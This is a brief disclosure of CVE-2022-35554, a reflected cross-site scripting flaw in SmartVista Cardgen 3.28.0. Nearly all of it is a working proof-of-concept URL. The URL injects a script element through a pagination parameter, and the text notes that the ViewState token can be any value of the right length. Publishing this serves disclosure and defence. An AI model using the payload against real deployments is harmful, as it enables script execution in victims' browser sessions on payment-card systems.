CVE-2022-35554: Reflected XSS in SmartVista Cardgen version 3.28.0 (CVE-2022-35554)

An attacker sends a draft URL https://[URL]/svcl/pages/monitoring/printingController.xhtml?javax.faces.partial.ajax=true&javax.faces.source=mainform%3AactiveProcesses&javax.faces.partial.execute=mainform%3AactiveProcesses&javax.faces.partial.render=mainform%3AactiveProcesses&mainform%3AactiveProcesses=mainform%3AactiveProcesses&mainform%3AactiveProcesses_pagination=true&mainform%3AactiveProcesses_first=6"]]><x:script+xmlns%3ax%3d"http%3a//www.w3.org/1999/xhtml">alert(document.domain)</x%3ascript>&mainform%3AactiveProcesses_rows=6&mainform%3AactiveProcesses_skipChildren=true&mainform%3AactiveProcesses_encodeFeature=true&mainform=mainform&mainform%3AactiveProcesses_selection=&mainform%3AactiveProcesses_scrollState=0%2C0&mainform%3Abatches_selection=&mainform%3Abatches_scrollState=0%2C0&mainform%3AprintEntries_selection=&mainform%3AprintEntries_scrollState=0%2C0&javax.faces.ViewState=0000000000000000000%3A0000000000000000000 to victim. When victim opens the URL, XSS will be triggered. In this URL, the javax.faces.ViewState parameter can be modified to have random value but having same length as value generated by application